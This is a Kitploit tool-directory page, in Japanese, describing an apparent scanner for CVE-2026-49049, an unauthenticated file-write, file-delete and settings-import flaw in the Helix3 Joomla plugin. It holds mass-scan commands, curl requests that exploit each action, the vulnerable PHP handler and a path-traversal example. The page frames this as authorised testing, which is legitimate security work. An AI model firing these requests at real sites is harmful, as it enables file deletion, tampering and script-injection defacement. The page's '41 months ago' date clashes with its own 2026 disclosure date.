Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-49049 — 読み取り専用の脆弱性スキャナ — CVE-2026-49049 Helix3 Joomlaプラグインの認証不要AJAXハンドラ | Kitploit
ツール/GitHubGitHub/shinthink/cve-2026-49049
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubshinthink/cve-2026-49049

CVE-2026-49049

読み取り専用の脆弱性スキャナ — CVE-2026-49049 Helix3 Joomlaプラグインの認証不要AJAXハンドラ

リポジトリを見る
41ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Python CVE CVSS License

CVE-2026-49049 — Helix3 Joomla プラグイン (JoomShaper)

未認証 AJAX ハンドラ — 読み取り専用の脆弱性スキャナ


概要

CVE-2026-49049 は、Joomla 用の Helix3 テンプレートフレームワーク (バージョン 1.0 から 3.1.0) に影響します。Joomla の com_ajax ディスパッチャ経由で到達可能な onAjaxHelix3 ハンドラは、いくつかの破壊的なアクションに対して 認証・認可・CSRF 検証を一切行いません。

アクション影響利用可能なバージョン
save攻撃者が制御する JSON ファイルを パストラバーサル 付きで書き込むすべてのバージョン
remove拡張子やパスの制限なし に任意のファイルを削除すべてのバージョン
importデータベースに保存されたテンプレートパラメータを上書きv3.x のみ

注: import アクションは Helix3 v3.x で追加されました。v2.x を実行しているサイトは save と remove のみ影響を受けます。

この脆弱性は Phil Taylor (mySites.guru) によって発見され、2026年6月29日に公開されました。

影響を受けるバージョン

Helix3 バージョンsave/removeimport
1.0 – 2.x影響あり存在しない
3.0 – 3.1.0影響あり影響あり
3.1.1+修正済み修正済み

インストール

root@kitploit:~
git clone https://github.com/shinthink/CVE-2026-49049.git
cd CVE-2026-49049
pip install -r requirements.txt

使用方法

root@kitploit:~
# Single target
python cve_2026_49049.py -t 192.168.1.100

# Mass scan
python cve_2026_49049.py -f targets.txt -o results.txt

# With JSON report + verbose
python cve_2026_49049.py -f targets.txt --json report.json -v

引数

root@kitploit:~
  -t, --target     Single target (domain or IP)
  -f, --file       File with targets, one per line
  -o, --output     Real-time text output (default: cve-2026-49049_scan.txt)
  --json           Structured JSON report (default: cve-2026-49049_report.json)
  --threads        Concurrent workers (default: 15)
  --timeout        HTTP timeout in seconds (default: 15)
  -v, --verbose    Show probe details

概念実証

検出と検証

このスキャナは読み取り専用プローブを実行します。未認証の save エンドポイントを介して Helix3 のレイアウトフォルダに無害な JSON ファイルを書き込み、書き込まれたことを確認した後、remove エンドポイントで直ちに削除します。ターゲットには永続的な変更は残りません。

root@kitploit:~
$ python cve_2026_49049.py -t 192.168.1.100 -v
root@kitploit:~
    CVE-2026-49049 — Helix3 (JoomShaper)
    Joomla Unauthenticated AJAX Handler Scanner

    [*] save   — accessible (probe: 3a9719da)
    [*] remove — accessible (probe cleaned)

  Host      : 192.168.1.100
  Status    : vulnerable
  Helix3    : 2.5.6
  Vulnerable: YES
  save      : YES
  remove    : YES
  import    : NO
  Time      : 2.0s

手動での再現

スキャナはこれらの正確なエンドポイントをプローブします。手動で検証するには:

手順 1 — Helix3 がインストールされていることを確認

root@kitploit:~
curl -sk 'https://target.com/templates/shaper_helix3/templateDetails.xml'
# Look for <version>X.X.X</version>

手順 2 — save アクションをテスト (未認証のファイル書き込み)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=save&data[layoutName]=_test_probe&data[content]={"probe":"test"}'

手順 3 — remove アクションをテスト (未認証のファイル削除)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=remove&data[layoutName]=_test_probe.json'

手順 4 — import アクションをテスト (v3.x のみ、v2.x では利用不可)

root@kitploit:~
curl -sk -X POST \
  'https://target.com/index.php?option=com_ajax&plugin=helix3&format=json' \
  -d 'data[action]=import&data[template_id]=1&data[settings]={}'

# Note: import was added in Helix3 v3.x.
# Sites running v2.x will return an empty response for this action.

脆弱性の仕組み

3.1.1 より前の Helix3 バージョンでは、plugins/ajax/helix3/helix3.php が onAjaxHelix3() を介してリクエストを処理しますが、ガードは一切ありません:

root@kitploit:~
public function onAjaxHelix3()
{
    $input = Factory::getApplication()->input;
    $data  = $input->post->get('data', [], 'array');
    $action = $data['action'];
    $layoutName = $data['layoutName'];

    // No auth check. No CSRF token. No path validation.
    $filepath = $layoutPath . $layoutName;   // path traversal possible

    switch ($action) {
        case 'remove':
            unlink($filepath);               // arbitrary file delete
            break;
        case 'save':
            fwrite(fopen($filepath . '.json', 'wb'), $data['content']);  // write
            break;
    }
}

なぜ危険なのか

  • Save + パストラバーサル — layoutName=../../../somewhere/evil により、意図したレイアウトディレクトリの外にファイルが書き込まれます
  • Remove には拡張子の制限がない — .json を追加する save とは異なり、remove はあらゆるファイルタイプを対象にできます
  • Import (v3.x) はデータベースのパラメータを上書き — custom_js はテンプレート出力内でエスケープされずにレンダリングされるため、すべてのページでスクリプトインジェクションが可能になります。これは実際の改ざん攻撃で使用されるベクタです。

免責事項

教育および許可されたテスト目的のみに使用してください。

このソフトウェアは、許可された侵入テストを実施するセキュリティ専門家、自社インフラを監査する組織、および脆弱性の悪用を研究する研究者を対象としています。

コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反する可能性があります:

  • 米国: Computer Fraud and Abuse Act (18 U.S.C. 1030)
  • インドネシア: UU ITE Pasal 30 & 46
  • 欧州連合: Directive 2013/40/EU
  • 英国: Computer Misuse Act 1990

作者は誤用に対する一切の責任を負いません。本ソフトウェアを使用することにより、あなたは自己の行為に対して全責任を負うものとします。


参考情報

リソースリンク

このプロジェクトは JoomShaper、Joomla、Open Source Matters, Inc. とは提携関係にありません。

ツールをダウンロード
元のアドバイザリ (mySites.guru)Helix3 3.1.1 Security Fix
NVD エントリCVE-2026-49049
OpenCVECVE-2026-49049
JoomShaper GitHubHelix3 Repository